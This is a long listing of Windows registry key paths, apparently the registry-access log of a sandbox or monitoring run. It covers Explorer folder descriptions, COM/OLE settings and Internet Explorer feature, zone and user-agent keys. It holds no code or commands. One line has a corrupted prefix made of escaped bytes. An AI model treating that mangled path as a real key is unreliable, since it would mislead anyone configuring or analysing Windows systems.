HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PropertyBag
HKEY_CURRENT_USER\Software\Classes\AppID\iexplore.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\74DD1FC8
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\EnablePreBinding
HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{871C5380-42A0-1069-A2EA-08002B30309D}
HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32\LoadWithoutCOM
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Option
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\AppCompatibility
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\AppCompat
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{871c5380-42a0-1069-a2ea-08002b30309d}\InProcServer32
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{871C5380-42A0-1069-A2EA-08002B30309D} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{871C5380-42A0-1069-A2EA-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\iexplore.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldDllVersionLow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldDllVersionHigh
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldVersionLow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldVersionHigh
HKEY_LOCAL_MACHINE\Software\Microsoft\Feeds
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Feeds\UrlCacheVersion
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\iexplore.exe
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\http\
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\*\
HKEY_LOCAL_MACHINE\Software\Microsoft\Ole
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MaximumAllowedAllocationSize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\Feature_Enable_Compat_Logging
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\Feature_Enable_Compat_Logging
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Compatible
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Compatible
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\UA Tokens
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
\xe1\x84\x90\xc2\x97EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Pre Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Pre Platform
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Pre Platform
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER\iexplore.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER\iexplore.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER\*
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\UrlMon Settings
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_POLICIES_ZONEMAP_IF_ESC_ENABLED_KB918915
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_IGNORE_POLICIES_ZONEMAP_IF_ESC_ENABLED_KB918915
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_UNC_SAVEDFILECHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_UNC_SAVEDFILECHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_UNC_SAVEDFILECHECK\iexplore.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_UNC_SAVEDFILECHECK\*
HKEY_LOCAL_MACHINE\System\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\iexplore.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\iexplore.exe
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableUTF8
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AcceptLanguage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\AllSitesCompatibilityMode
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\BrowserEmulation
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\IntranetCompatibilityMode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\MSCompatibilityMode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\UnattendLoaded
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_LEGACY_COMPRESSION
